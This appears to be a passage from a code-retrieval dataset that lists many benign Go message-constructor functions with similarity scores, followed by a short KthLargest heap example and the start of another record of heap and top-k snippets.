t,\n\t\tPayload: payload,\n\t\tInitiator: initiator,\n\t\tCreated: time.Now(),\n\t\tDeadline: time.Now().Add(time.Minute * 2),\n\t\tHeaders: map[string]string{},\n\t}\n\n\tif span != nil {\n\t\tmsg.Tracing = opentracing.TextMapCarrier{}\n\t\tspan.Tracer().Inject(span.Context(), opentracing.TextMap, msg.Tracing)\n\t}\n\n\treturn msg\n}", "func NewMessage(t MessageType, f MessageFlags, u NetlinkMarshaler) (msg *Message, err error) {\n\tmsg = &Message{Header: NewHeader(t, f, 0)}\n\tmsg.Body, err = u.MarshalNetlink()\n\tif err == nil {\n\t\tmsg.Header.SetMessageLength(uint32(msg.Header.Len()) + uint32(len(msg.Body)))\n\t}\n\treturn\n}", "func NewMessage(room, raw string) Message {\n\tmsg := Message{\n\t\troom: room,\n\t\traw: raw,\n\t}\n\tmsg.GetArgs()\n\n\treturn msg\n}", "func newMessageBuilder() *messageBuilder {\n\tm := &messageBuilder{&Message{}, &InnerMessage{}}\n\tm.msg.InnerMessage = m.inner\n\treturn m\n}", "func (j *jobMessage) newMessageChan() {\n\tj.JobMessageChan = MessageChanFactory()\n}", "func NewMessage(from int32, to int32, body []byte) *Message {\n\treturn &Message{\n\t\tFrom: from,\n\t\tTo: to,\n\t\tBody: body,\n\t}\n}", "func NewMessage(from, content string, contact chan<- *Message) *Message {\n\treturn &Message{\n\t\tfrom: from,\n\t\tcontent: content,\n\t\tcontact: contact,\n\t\tcreated: time.Now(),\n\t}\n}", "func NewMessage(data []byte) (*Message, error) {\n\t// The message must have at least 8 bytes in order to catch all of the\n\t// character definitions in the header.\n\tif len(data) < 8 {\n\t\treturn nil, io.EOF\n\t}\n\treader := bytes.NewBuffer(data)\n\n\tm := Message{\n\t\treader: bufio.NewReader(reader),\n\t\tfieldSep: data[3],\n\t\tcompSep: data[4],\n\t\trepeat: data[5],\n\t\tescape: data[6],\n\t\tsubCompSep: data[7],\n\t}\n\treturn &m, nil\n}", "func New(message string) (*MessageFormat, error) {\n\tp := &parser{\n\t\tinput: []rune(message),\n\t}\n\tif err := p.parse(); err != nil {\n\t\treturn nil, fmt.Errorf(\"messageformat: cannot parse message: %s\", err)\n\t}\n\n\treturn &MessageFormat{p.blocks}, nil\n}", "func Get() *Message {\n\tmsg := Pool.Get().(*Message)\n\tmsg.reset()\n\treturn msg\n}", "func NewMessages(client *Client) *Messages {\n\treturn &Messages{\n\t\tclient: client,\n\t\tcache: make(map[int64]*Message),\n\t\tmessageLists: make(map[int64][]*Message),\n\t\tlatest: make(map[int64]int64),\n\t}\n}", "func NewMessage(protoMessage *protobuf.Message) Message {\n\tm := &message{\n\t\tprotoMessage: protoMessage,\n\n\t\tfullyQualifiedName: \"\",\n\n\t\tnestedEnumNameToEnum: make(map[string]Enum),\n\t\tnestedMessageNameToMessage: make(map[string]Message),\n\n\t\tfieldNameToField: make(map[string]*MessageField),\n\t\toneofFieldNameToOneofField: make(map[string]Oneof),\n\t\tmapFieldNameToMapField: make(map[string]*MapField),\n\n\t\tlineToField: make(map[int]*MessageField),\n\t\tlineToOneofField: make(map[int]Oneof),\n\t\tlineToMapField: make(map[int]*MapField),\n\n\t\tmu: &sync.RWMutex{},\n\t}\n\n\tfor _, e := range protoMessage.Elements {\n\t\tswitch v := e.(type) {\n\n\t\tcase *protobuf.NormalField:\n\t\t\tf := NewMessageField(v)\n\t\t\tm.fields = append(m.fields, f)\n\n\t\tcase *protobuf.Oneof:\n\t\t\tf := NewOneof(v)\n\t\t\tm.oneofs = append(m.oneofs, f)\n\n\t\tcase *protobuf.MapField:\n\t\t\tf := NewMapField(v)\n\t\t\tm.mapFields = append(m.mapFields, f)\n\n\t\tdefault:\n\t\t}\n\t}\n\n\tfor _, f := range m.fields {\n\t\tm.fieldNameToField[f.ProtoField.Name] = f\n\t\tm.lineToField[f.ProtoField.Position.Line] = f\n\t}\n\n\tfor _, f := range m.oneofs {\n\t\tm.oneofFieldNameToOneofField[f.Protobuf().Name] = f\n\t\tm.lineToOneofField[f.Protobuf().Position.Line] = f\n\t}\n\n\tfor _, f := range m.mapFields {\n\t\tm.mapFieldNameToMapField[f.ProtoMapField.Name] = f\n\t\tm.lineToMapField[f.ProtoMapField.Position.Line] = f\n\t}\n\n\treturn m\n}", "func NewMessage(from, to address.Address, nonce uint64, value abi.TokenAmount, method abi.MethodNum, params []byte) *types.Message {\n\treturn &types.Message{\n\t\tVersion: 0,\n\t\tTo: to,\n\t\tFrom: from,\n\t\tNonce: nonce,\n\t\tValue: value,\n\t\tMethod: method,\n\t\tParams: params,\n\t}\n}", "func New(securityreqid string, securityrequesttype int) *Message {\n\tvar m Message\n\tm.SetSecurityReqID(securityreqid)\n\tm.SetSecurityRequestType(securityrequesttype)\n\treturn &m\n}", "func NewMessageCache(gossip, history int) *MessageCache {\n\tif gossip > history {\n\t\terr := fmt.Errorf(\"invalid parameters for message cache; gossip slots (%d) cannot be larger than history slots (%d)\",\n\t\t\tgossip, history)\n\t\tpanic(err)\n\t}\n\treturn &MessageCache{\n\t\tmsgs: make(map[string]*pb.Message),\n\t\tpeertx: make(map[string]map[peer.ID]int),\n\t\thistory: make([][]CacheEntry, history),\n\t\tgossip: gossip,\n\t\tmsgID: DefaultMsgIdFn,\n\t}\n}", "func makeEmptyMessage(msgType MessageType) (Message, error) {\n\tswitch msgType {\n\tcase VERSION_TYPE:\n\t\treturn &Version{}, nil\n\tcase VERACK_TYPE:\n\t\treturn &VersionAck{}, nil\n\tcase PING_TYPE:\n\t\treturn &PingMsg{}, nil\n\tcase PONG_TYPE:\n\t\treturn &PongMsg{}, nil\n\tcase GETADDR_TYPE:\n\t\treturn &AddrReq{}, nil\n\tcase ADDR_TYPE:\n\t\treturn &Addr{}, nil\n\tcase REJECT_TYPE:\n\t\treturn &RejectMsg{}, nil\n\tcase GET_HEADERS_TYPE:\n\t\treturn &BlockHeaderReq{}, nil\n\tcase HEADERS_TYPE:\n\t\treturn &BlockHeaders{}, nil\n\tcase GET_BLOCK_TYPE:\n\t\treturn &BlockReq{}, nil\n\tcase BLOCK_TYPE:\n\t\treturn &Block{}, nil\n\tcase TX_TYPE:\n\t\treturn &Transaction{}, nil\n\tcase TRACE_TYPE:\n\t\treturn &TraceMsg{}, nil\n\tdefault:\n\t\treturn nil, fmt.Errorf(\"unknown message type %v\", msgType)\n\t}\n}", "func NewMessage(date time.Time, from, to Address, replyTo *Address, subject string, body []byte) (*Message, error) {\n\tid, err := NewID()\n\n\treturn &Message{\n\t\tID: id,\n\t\tHeaders: NewHeaders(date, from, to, replyTo, subject, detectContentType(body)),\n\t\tBody: body,\n\t}, errors.WithMessage(err, \"could not create ID\")\n}", "func MessagesCreateNewMessageHandler(params messages.CreateNewMessageParams, principal *models.Principal) middleware.Responder {\n\tchat, err := dao.GetChatByIDAndUserID(params.ChatID, principal.Userid.Hex())\n\tif err != nil {\n\t\tattribute := \"error\"\n\t\tmessage := err.Error()\n\t\treturn messages.NewCreateNewMessageBadRequest().WithPayload(&models.InvalidParameterInput{Attribute: &attribute, Message: &message})\n\t}\n\n\tmessage := params.Body\n\tmessage.From = &models.UserShort{\n\t\tID: principal.Userid,\n\t}\n\tmessage.Time = strfmt.NewDateTime()\n\n\tdao.TouchChat(chat.ID.Hex())\n\tdao.SaveMessage(*chat, *message)\n\n\treturn messages.NewCreateNewMessageOK().WithPayload(message)\n}", "func NewMessage(id string, data []byte, attr map[string]string, subs []*Subscription) *Message {\n\tm := &Message{\n\t\tID: id,\n\t\tData: data,\n\t\tAttributes: attr,\n\t\tSubscribeIDs: make([]string, 0),\n\t\tPublishedAt: time.Now(),\n\t}\n\tfor _, sub := range subs {\n\t\tm.AddSubscription(sub.Name)\n\t}\n\treturn m\n}", "func NewMessage(topic string, payload []byte, qos uint8, opts ...msgOptions) packets.Message {\n\tm := &msg{\n\t\ttopic: topic,\n\t\tqos: qos,\n\t\tpayload: payload,\n\t}\n\tfor _, v := range opts {\n\t\tv(m)\n\t}\n\treturn m\n}", "func (rst *REST) CreateMessage(w http.ResponseWriter, r *http.Request) {\n\tctx := r.Context()\n\tb, err := ioutil.ReadAll(r.Body)\n\tif err != nil {\n\t\tresponse{\n\t\t\tError: err.Error(),\n\t\t\tStatus: http.StatusBadRequest,\n\t\t}.respond(w)\n\t\treturn\n\t}\n\tdefer r.Body.Close()\n\tvar msg model.Message\n\tjson.Unmarshal(b, &msg)\n\terr = validator.Validate(msg)\n\tif err != nil {\n\t\tresponse{\n\t\t\tError: err.Error(),\n\t\t\tStatus: http.StatusBadRequest,\n\t\t}.respond(w)\n\t\treturn\n\t}\n\terr = rst.service.CreateMessage(ctx, msg)\n\tif err != nil {\n\t\tresponse{\n\t\t\tError: err.Error(),\n\t\t\tStatus: http.StatusInternalServerError,\n\t\t}.respond(w)\n\t\treturn\n\t}\n\tresponse{\n\t\tData: msg,\n\t\tError: nil,\n\t\tStatus: http.StatusOK,\n\t}.respond(w)\n\treturn\n}", "func New(quoteid string, instrument instrument.Instrument) *Message {\n\tvar m Message\n\tm.SetQuoteID(quoteid)\n\tm.SetInstrument(instrument)\n\treturn &m\n}", "func (svc *MsgSvc) CreateMessage(body string) (*Message, error) {\n\tnewMsg := &Message{\n\t\tID: uuid.NewV4(),\n\t\tBody: body,\n\t\tCreatedAt: time.Now(),\n\t}\n\n\tsvc.Database = append(svc.Database, newMsg)\n\treturn newMsg, nil\n}", "func (msg Message) NewCommandMessage() *commands.Message {\n\tvar cmdMsg commands.Message\n\tfor _, element := range msg.Args {\n\t\tvar data commands.Data\n\t\tdata.Name = element.Name\n\t\tdata.Value = element.Value\n\t\tcmdMsg.Msg = append(cmdMsg.Msg, &data)\n\t}\n\treturn &cmdMsg\n}", "func New(dkreason string, symbol string, side string) *Message {\n\tvar m Message\n\tm.SetDKReason(dkreason)\n\tm.SetSymbol(symbol)\n\tm.SetSide(side)\n\treturn &m\n}", "func NewMessage(channel, username, hostname string, attc *Attachment,\n\tentry *logrus.Entry,\n) (msg *Message) {\n\tmsg = &Message{\n\t\tattc: NewAttachment(attc, entry),\n\t\tentryData: entry.Data,\n\t\tentryLevel: entry.Level,\n\t\tentryMsg: entry.Message,\n\t}\n\n\treturn\n}", "func (p *nodeProcessor) initNewMessage(msg Message, netSize, curCounter int) (exists bool) {\n\texistingID := func(msgId int) bool {\n\t\tfor _, val := range p.msgIDs {\n\t\t\tif val == msgId {\n\t\t\t\treturn true\n\t\t\t}\n\t\t}\n\t\treturn false\n\t}\n\n\tgetDestList := func() []int {\n\t\tres := make([]int, 0, len(p.neighbours))\n\t\tfor key := range p.neighbours {\n\t\t\tres = append(res, key)\n\t\t}\n\t\treturn res\n\t}\n\n\tmsgId := msg.ID\n\tif !existingID(msgId) { // If such msgId is already known to this node then error is generated\n\t\t // but it doesn't garantee that there are no such msgId in the whole Net.\n\t\t // If it's already exists it will be ignored by nodes or can be processed\n\t\t // incorrectly.\n\t\tp.m.Lock()\n\t\tp.acks[msgId] = make([]bool, netSize)\n\t\tp.acks[msgId][p.myID] = true\n\t\tp.msgIDs = append(p.msgIDs, msgId)\n\t\tp.msgQueue.putMessage(msg, getDestList())\n\t\tp.waiting[msgId] = curCounter\n\t\tp.m.Unlock()\n\t\tlogger.Printf(\"[NODE %d] new message inited: %s\", p.myID, msg)\n\t\treturn false\n\t}\n\treturn true\n}", "func NewMessage(nonce pow.Nonce, expiration time.Time, streamNumber uint64, encrypted []byte) *Message {\n\treturn &Message{\n\t\theader: wire.NewObjectHeader(\n\t\t\tnonce,\n\t\t\texpiration,\n\t\t\twire.ObjectTypeMsg,\n\t\t\tMessageVersion,\n\t\t\tstreamNumber,\n\t\t),\n\t\tEncrypted: encrypted,\n\t}\n}", "func NewMessage(collection *mgo.Collection, name string , mail string,\n content string) *Message {\n p := new(Message)\n p.Meta.Bind(collection, p)\n p.Id = bson.NewObjectId()\n\n p.AuthorName = name\n p.AuthorMail = mail\n p.Content = content\n\n return p\n}", "func (c *Store) AddMessage(msg *messages.JSONMessage, refresh updateFunc) {\n\tc.Lock.Lock()\n\tdefer c.Lock.Unlock()\n\n\tmessageFrom := msg.From.Fingerprint\n\taddress := fmt.Sprintf(\"%s/%s\", messageFrom, msg.Name)\n\n\texpiry := c.getMessageExpiration(msg)\n\n\tretrieved := time.Now()\n\n\trecord := &MessageRecord{\n\t\tJSONMessage: msg,\n\t\tPublic: msg.Public,\n\t\tUpdater: refresh,\n\t\trecord: record{\n\t\t\tRetrieved: retrieved,\n\t\t\tExpires: expiry,\n\t\t},\n\t}\n\n\t// Update Latest\n\tif retrieved.After(c.Latest) {\n\t\tc.Latest = retrieved\n\t}\n\n\tc.Named[address] = record\n\n\t// Add the message to the public list (for profile viewing) if\n\t// necessary.\n\tif msg.Public {\n\t\tc.Public[messageFrom] = append(c.Public[messageFrom], record)\n\t}\n}", "func (vm *VM) CachedMessage(v Interface) *Message {\n\treturn &Message{\n\t\tObject: *vm.CoreInstance(\"Message\"),\n\t\tText: vm.AsString(v),\n\t\tMemo: v,\n\t}\n}" ]
[ "0.76747173", "0.75967216", "0.7573609", "0.7450602", "0.7434523", "0.7382211", "0.7325671", "0.7325356", "0.7283416", "0.727642", "0.7223555", "0.7203074", "0.7185232", "0.7172994", "0.71674216", "0.71535164", "0.71507347", "0.7118813", "0.7068694", "0.70560145", "0.7037355", "0.7029328", "0.6990191", "0.69507354", "0.6945934", "0.6943736", "0.69081944", "0.6899556", "0.6884019", "0.6874992", "0.6869187", "0.6852081", "0.6845334", "0.68428373", "0.683979", "0.68225855", "0.68206054", "0.68123746", "0.68001145", "0.67985183", "0.67842823", "0.6772419", "0.6768015", "0.6768015", "0.67623734", "0.6754947", "0.67452157", "0.673933", "0.6728654", "0.6706288", "0.6688912", "0.6668663", "0.66580766", "0.6621691", "0.65679437", "0.65629405", "0.6562855", "0.6557597", "0.6540644", "0.6530214", "0.6529809", "0.6524656", "0.65078455", "0.64985555", "0.6489069", "0.64818984", "0.6478984", "0.64680994", "0.64653015", "0.6452758", "0.64401954", "0.64359623", "0.6435114", "0.6413906", "0.64116174", "0.6409611", "0.63873225", "0.6377617", "0.63617396", "0.63365614", "0.6320256", "0.6315098", "0.6288219", "0.6280352", "0.62407786", "0.62372077", "0.62259066", "0.6191435", "0.6190824", "0.61839527", "0.6145721", "0.61426467", "0.61349815", "0.6133959", "0.61333895", "0.6123939", "0.6112609", "0.6107559", "0.60895455", "0.60876375" ]
0.7645472
1
Your KthLargest object will be instantiated and called as such: obj := Constructor(k, nums); param_1 := obj.Add(val);
func main() { k := 3 arr := []int{4,5,8,2} obj := Constructor(k, arr) fmt.Println(obj.Add(3)) fmt.Println(obj.Add(5)) fmt.Println(obj.Add(10)) fmt.Println(obj.Add(9)) fmt.Println(obj.Add(4)) }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func main() {\n\th := &IntHeap{2, 1, 5}\n\theap.Init(h)\n\theap.Push(h, 3)\n\tfmt.Printf(\"minimum: %d\\n\", (*h)[0])\n\tfor h.Len() > 0 {\n\t\tfmt.Printf(\"%d \", heap.Pop(h))\n\t}\n\n\tfmt.Println()\n\ttempKthLargest := Constructor(3, []int{1000, 4,5,8,2,9, 10, 100})\n\t//for tempKthLargest.MyHeap.Len() > 0 {\n\t//\tfmt.Printf(\"%d \", heap.Pop(tempKthLargest.MyHeap))\n\t//}\n\tfmt.Println()\n\tfmt.Println(tempKthLargest.Add(10000))\n\n\tConstructor(1, []int{})\n\t//fmt.Println(heap.Pop(temp2.MyHeap))\n}", "func findKthLargest(nums []int, k int) int {\n\ttempnum := make([]int, 1)\n\ttempnum = append(tempnum, nums...)\n\tlength := len(tempnum)\n\tfmt.Println(tempnum)\n\tbeginIndex := k / 2\n\tfor i := beginIndex; i > 0; i-- {\n\t\tMinHeapifyI(tempnum, i, k)\n\t}\n\n\tfor i := k + 1; i < length; i++ {\n\t\tif tempnum[i] > tempnum[1] {\n\t\t\t// tempnum[1], tempnum[i] = tempnum[i], tempnum[0]\n\t\t\ttempnum[1] = tempnum[i]\n\t\t\tMinHeapifyI(tempnum, 1, k)\n\t\t}\n\n\t}\n\tfmt.Println(\"tempnum\", tempnum)\n\treturn tempnum[1]\n}", "func main() {\n\tmedianFinder := Constructor()\n\tmedianFinder.AddNum(40)\n\tmedianFinder.AddNum(12)\n\tmedianFinder.AddNum(16)\n\tmedianFinder.AddNum(14)\n\tmedianFinder.AddNum(35)\n\tmedianFinder.AddNum(19)\n\tmedianFinder.AddNum(34)\n\tmedianFinder.AddNum(35)\n\tmedianFinder.AddNum(28)\n\tmedianFinder.AddNum(35)\n\tmedianFinder.AddNum(26)\n\tmedianFinder.AddNum(6)\n\tmedianFinder.AddNum(8)\n\tmedianFinder.AddNum(2)\n\tmedianFinder.AddNum(14)\n\tmedianFinder.AddNum(25)\n\tmedianFinder.AddNum(25)\n\tmedianFinder.AddNum(4)\n\tmedianFinder.AddNum(33)\n\tmedianFinder.AddNum(18)\n\tmedianFinder.AddNum(10)\n\tmedianFinder.AddNum(14)\n\tfmt.Println(medianFinder.FindMedian())\n\n\tfmt.Println(bigHeapifyFromUp([]int{6, 19, 26, 12, 16, 14}, 0, 5))\n}", "func Test_findKthLargest(t *testing.T) {\n\tcases := []entry215{\n\t\t{\n\t\t\tname: \"x1\",\n\t\t\tinput: entry215input{\n\t\t\t\tnums: []int{3, 2, 1, 5, 6, 4},\n\t\t\t\tk: 2,\n\t\t\t},\n\t\t\texpected: 5,\n\t\t},\n\t\t{\n\t\t\tname: \"x2\",\n\t\t\tinput: entry215input{\n\t\t\t\tnums: []int{3, 2, 1, 5, 6, 4},\n\t\t\t\tk: 4,\n\t\t\t},\n\t\t\texpected: 3,\n\t\t},\n\t}\n\n\tfor _, tt := range cases {\n\t\tt.Run(tt.name, func(t *testing.T) {\n\t\t\tif output := findKthLargest(tt.input.nums, tt.input.k); output != tt.expected {\n\t\t\t\tt.Errorf(\"findKthLargest(%v,%d)=%d, expected=%d\", tt.input.nums, tt.input.k, output, tt.expected)\n\t\t\t}\n\t\t})\n\t}\n}", "func topKFrequent(nums []int, k int) []int {\n \n}", "func findKthLargestHeap(nums []int, k int) int {\n\th := heap(nums)\n\th.build()\n\tfor i := 1; i < k; i++ {\n\t\th.pop()\n\t}\n\treturn h.pop()\n}", "func findKthSmallestNumberUsingMaxHeap(nums []int, k int) int {\n\tif k > len(nums) {\n\t\treturn -1\n\t}\n\tvar maxheap MaxHeap\n\theap.Init(&maxheap)\n\n\tfor i := 0; i < k; i++ {\n\t\theap.Push(&maxheap, nums[i])\n\t}\n\n\tfor i := k; i < len(nums); i++ {\n\t\tif nums[i] < maxheap[0] {\n\t\t\theap.Pop(&maxheap)\n\t\t\theap.Push(&maxheap, nums[i])\n\t\t}\n\t}\n\n\treturn maxheap[0]\n}", "func findKthNumber(m int, n int, k int) int {\n \n}", "func TestLeetCode(t *testing.T) {\n\ts := []int{5, 4, 8, 1, 2, 3, 4, 99, 80, 10, 99}\n\n\td := findKthLargest(s, 5)\n\n\tt.Log(d)\n\tt.Log(s)\n\treturn\n}", "func findKthLargest(nums []int, k int) int {\n\tk = len(nums) - k // there are k nums >= x, so n-k <= x, so x locate at ***index(from 0)*** n-k\n\tqsortk(nums, 0, len(nums), k)\n\treturn nums[k]\n}", "func findKthLargest2(nums []int, k int) int {\n\theapSort(nums, len(nums))\n\treturn nums[k-1]\n}", "func findKthLargestM1(nums []int, k int ) int {\n\tfor i:=0;i<k;i++{\n\t\tfor j:=0;j<len(nums)-i-1;j++{\n\t\t\tif nums[j]>nums[j+1]{\n\t\t\t\tnums[j],nums[j+1] = nums[j+1],nums[j]\n\t\t\t}\n\t\t}\n\t}\n\treturn nums[len(nums)-k]\n}", "func main() {\n\tgreatest := max(10, 20, 15, 8, 9, 6)\n\tfmt.Println(greatest)\n}", "func FindKthMax(nums []int, k int) (int, error) {\n\tindex := len(nums) - k\n\treturn kthNumber(nums, index)\n}", "func main(){\n\t maxQueue := Constructor()\n\t maxQueue.Push_back(94)\n\t maxQueue.Push_back(16)\n\t maxQueue.Push_back(89)\n\t fmt.Println(maxQueue.Pop_front())\n\t maxQueue.Push_back(22)\n\t maxQueue.Push_back(33)\n\t maxQueue.Push_back(44)\n\t maxQueue.Push_back(111)\n\t maxQueue.Pop_front()\n\t maxQueue.Pop_front()\n\t maxQueue.Pop_front()\n\t fmt.Println(maxQueue.Max_value())\n }", "func main() {\n\tvar param_1 int\n\tobj := Constructor(2)\n\t//param_1 =obj.Get(2)\n\t//fmt.Println(param_1)\n\tobj.Put(2, 6)\n\tobj.Put(1, 1)\n\tparam_1 = obj.Get(1)\n\tfmt.Println(param_1)\n\n\tobj.Put(2, 3)\n\tobj.Put(4, 1)\n\tparam_1 = obj.Get(1)\n\tfmt.Println(param_1)\n\n\t//obj.Put(4,4)\n\n\tparam_1 = obj.Get(2)\n\tfmt.Println(param_1)\n\n\t//param_1 =obj.Get(3)\n\t//fmt.Println(param_1)\n\t//\n\t//param_1 =obj.Get(4)\n\t//fmt.Println(param_1)\n}", "func main() {\n\n\tobj := Constructor(2)\n\tobj.Put(1,1)\n\tobj.Put(2,2)\n\tfmt.Println(\"拿1\",obj.Get(1))\n\tobj.Put(3,3)\n\n\tfmt.Println(\"拿2\",obj.Get(2))\n\tfmt.Println(\"拿3\",obj.Get(3))\n\tobj.Put(4,4)\n\tfmt.Println(\"拿1\",obj.Get(1))\n\tfmt.Println(\"拿3\",obj.Get(3))\n\tfmt.Println(\"拿4\",obj.Get(4))\n\n}", "func main() {\n\tmichael := CreatePerson(\"Michael\", 23)\n\tleah := CreatePerson(\"Leah\", 22)\n\tjake := CreatePerson(\"jake\", 19)\n\ttim := CreatePerson(\"tim\", 12)\n\tlarry := CreatePerson(\"larry\", 20)\n\tlenny := CreatePerson(\"lenny\", 21)\n\tjunior := CreatePerson(\"junior\", 10)\n\n\tpersonList := []Comparable{michael, leah, jake, tim, larry, lenny, junior}\n\n\t// HEAPSORT\n\tfmt.Println(\"### Testing HeapSort Implementation ###\")\n\tfmt.Println(\"Before Sorting:\")\n\tfor _, value := range personList {\n\t\tfmt.Println(value)\n\t}\n\n\tHeapSort(personList)\n\n\tfmt.Println(\"\\nAfter Sorting:\")\n\tfor _, value := range personList {\n\t\tfmt.Println(value)\n\t}\n\n\tfmt.Printf(\"\\n### Constructing Max Heap ###\\n\")\n\tpersonHeap := CreateMaxHeap(10)\n\tpersonHeap.Add(michael)\n\tpersonHeap.Add(leah)\n\tpersonHeap.Add(jake)\n\tpersonHeap.Add(tim)\n\tpersonHeap.Add(larry)\n\tpersonHeap.Add(lenny)\n\tpersonHeap.Add(junior)\n\n\tfmt.Println(\"Popping values from top of Max Heap\")\n\tvalue, ok := personHeap.Pop()\n\tfor ok {\n\t\tfmt.Printf(\"Top Value: %v\\n\", value)\n\t\tvalue, ok = personHeap.Pop()\n\t}\n}", "func KLargest(slice interface{}, k int, cmp func(j, k int) int) interface{} {\n\tv := reflect.ValueOf(slice)\n\ti := v.Len() / 2\n\n\tpos := PartitionGT(slice, i, cmp) + 1\n\tif pos == k {\n\t\treturn v.Slice(0, k).Interface()\n\t}\n\n\tif pos < k {\n\t\treturn reflect.AppendSlice(\n\t\t\tv.Slice(0, pos),\n\t\t\treflect.ValueOf(KLargest(v.Slice(pos+1, v.Len()).Interface(), k-pos, cmp)),\n\t\t).Interface()\n\t}\n\n\t// pos > k\n\n\treturn KLargest(v.Slice(0, pos-1).Interface(), k, cmp)\n}", "func (fn *formulaFuncs) kth(name string, argsList *list.List) formulaArg {\n\tif argsList.Len() != 2 {\n\t\treturn newErrorFormulaArg(formulaErrorVALUE, fmt.Sprintf(\"%s requires 2 arguments\", name))\n\t}\n\tarray := argsList.Front().Value.(formulaArg).ToList()\n\targK := argsList.Back().Value.(formulaArg).ToNumber()\n\tif argK.Type != ArgNumber {\n\t\treturn argK\n\t}\n\tk := int(argK.Number)\n\tif k < 1 {\n\t\treturn newErrorFormulaArg(formulaErrorNUM, \"k should be > 0\")\n\t}\n\tvar data []float64\n\tfor _, arg := range array {\n\t\tif arg.Type == ArgNumber {\n\t\t\tdata = append(data, arg.Number)\n\t\t}\n\t}\n\tif len(data) < k {\n\t\treturn newErrorFormulaArg(formulaErrorNUM, \"k should be <= length of array\")\n\t}\n\tsort.Float64s(data)\n\tif name == \"LARGE\" {\n\t\treturn newNumberFormulaArg(data[len(data)-k])\n\t}\n\treturn newNumberFormulaArg(data[k-1])\n}", "func main() {\n\tn := max(1, 2, 3, 4, 5, 6, 7, 8, 9, 20)\n\tfmt.Println(n)\n}", "func kthLargestNumber(nums []string, k int) string {\n\tsort.Slice(nums, func(i, j int) bool {\n\t\tif len(nums[i]) != len(nums[j]) {\n\t\t\treturn len(nums[i]) < len(nums[j])\n\t\t}\n\t\tfor x := range nums[i] {\n\t\t\tif nums[i][x] != nums[j][x] {\n\t\t\t\treturn nums[i][x] < nums[j][x]\n\t\t\t}\n\t\t}\n\t\treturn false\n\t})\n\treturn nums[len(nums)-k]\n}", "func New(k int, l Less) Interface {\n\treturn &topK{k, &comparables{make([]interface{}, 0, k), l}}\n}", "func main() {\n\tobj := Constructor()\n\tobj.Push(10)\n\tobj.Pop()\n\tfmt.Println(obj.Top())\n\tfmt.Println(obj.GetMin())\n}", "func findLargestNumber(args ...int) int {\n\tnumber := args[0]\n\n\tfor _, value := range args {\n\t\tif value > number {\n\t\t\tnumber = value\n\t\t}\n\t}\n\treturn number\n}", "func main() {\n\tk := 10\n\ttopk := topTokens(os.Stdin, k)\n\tfor i := 0; i < k; i++ {\n\t\tfmt.Println(string(heap.Pop(&topk).([]byte)))\n\t}\n}", "func thirdMax(nums []int) int {\n \n}", "func findKthLargestM2(nums []int, k int ) int {\n\t// https://tip.golang.org/src/sort/sort.go?s=4433:4458#L182\n\t// https://www.golangprograms.com/golang/sort-reverse-search-functions/\n\t// sort.Sort(sort.Reverse(sort.IntSlice(a))) to sort in descending order\n\tsort.Ints(nums)\n\treturn nums[len(nums)-k]\n}", "func KthSmallestElement(array []int, k int) interface{} {\n\th := &MaxHeap{}\n\theap.Init(h)\n\tfor i := 0; i < len(array); i++ {\n\t\theap.Push(h, array[i])\n\t\tif h.Len() > k {\n\t\t\theap.Pop(h)\n\t\t}\n\t}\n\n\tans := heap.Pop(h)\n\treturn ans\n}", "func Max(key []byte, nodes []*memberlist.Node) (max *memberlist.Node) {\n\tmaxValue := big.NewInt(0)\n\n\tCompute(key, nodes, func(node *memberlist.Node, bi *big.Int) {\n\t\tif bi.Cmp(maxValue) == 1 {\n\t\t\tmaxValue = bi\n\t\t\tmax = node\n\t\t}\n\t})\n\n\treturn max\n}", "func TestLargest(t *testing.T) {\n\tp, s := beam.NewPipelineWithRoot()\n\tcol := beam.Create(s, 1, 11, 7, 5, 10)\n\ttopTwo := Largest(s, col, 2, lessInt)\n\tpassert.Equals(s, topTwo, []int{11, 10})\n\tif err := ptest.Run(p); err != nil {\n\t\tt.Errorf(\"pipeline failed but should have succeeded, got %v\", err)\n\t}\n}", "func main() {\n\tobj := Constructor()\n\tobj.Push(-2)\n\tobj.Push(0)\n\tobj.Push(-3)\n\tfmt.Println(obj.Top(), obj.Min()) // -3 -3\n\tobj.Pop()\n\tfmt.Println(obj.Top(), obj.Min()) // 0 -2\n\n\tfmt.Println()\n\tobj2 := Constructor()\n\tobj2.Push(-2)\n\tobj2.Push(0)\n\tobj2.Push(-1)\n\tfmt.Println(obj2.Min(), obj2.Top()) // -2 -1\n\tobj2.Pop()\n\tfmt.Println(obj2.Min(), obj2.Top()) // -2 0\n\n\tfmt.Println()\n\tobj3 := Constructor()\n\tobj3.Push(2)\n\tobj3.Push(0)\n\tobj3.Push(3)\n\tobj3.Push(0)\n\tfmt.Println(obj3.Min(), obj3.Top()) // 0 0\n\tobj3.Pop()\n\tfmt.Println(obj3.Min(), obj3.Top()) // 0 3\n\tobj3.Pop()\n\tfmt.Println(obj3.Min(), obj3.Top()) // 0 0\n\tobj3.Pop()\n\tfmt.Println(obj3.Min(), obj3.Top()) // 2 2\n}", "func MakeMaxHeap() *MaxHeap {\n maxheap := new(MaxHeap)\n heap.Init(maxheap)\n return maxheap\n}", "func New(k int) *Tree {\n\tvar t *Tree\n\tfor _, v := range []int{6, 4, 5, 2, 9, 8, 7, 3, 1} {\n\t\tt = insert(t, v)\n\t}\n\treturn t\n}", "func main() {\n\t// 1, 7, 2, 3, 8, 1, 1 : collide two max stones : 7, 8 here remaining 1 . 1 will added\n\t// 1, 2, 3, 1, 1, 1 : collide 3 and 2 and remaining 1 will be added\n\t// 1, 1, 1, 1, 1 : collide 1, 1 nothing will be added\n\t// 1 1 1 : collide 1 and 1 nothing will be added\n\t// 1 will be answer\n\ta := []int{1, 7, 2, 3, 8, 1, 1}\n\n\t/*\n\t\t// this works too\n\t\th := &IntHeap{}\n\t\theap.Init(h)\n\t\tfor _, item := range a {\n\t\t\theap.Push(h, item)\n\t\t}\n\t*/\n\n\thh := IntHeap(a)\n\th := &hh\n\theap.Init(h)\n\tfor h.Len() >= 2 {\n\t\telement1 := heap.Pop(h)\n\t\telement2 := heap.Pop(h)\n\t\titem1 := element1.(int)\n\t\titem2 := element2.(int)\n\n\t\tfmt.Println(\"item1 popped=\", item1)\n\t\tfmt.Println(\"item2 popped=\", item2)\n\n\t\tif item1 > item2 {\n\t\t\theap.Push(h, item1-item2)\n\t\t}\n\t}\n\tif h.Len() > 0 {\n\t\tfmt.Println(\"answer=\", heap.Pop(h))\n\t} else {\n\t\tfmt.Println(\"answer is empty\")\n\t}\n\n}", "func (t *Table) Biggest() y.Key { return t.biggest }", "func TestTopKFrequentElements(t 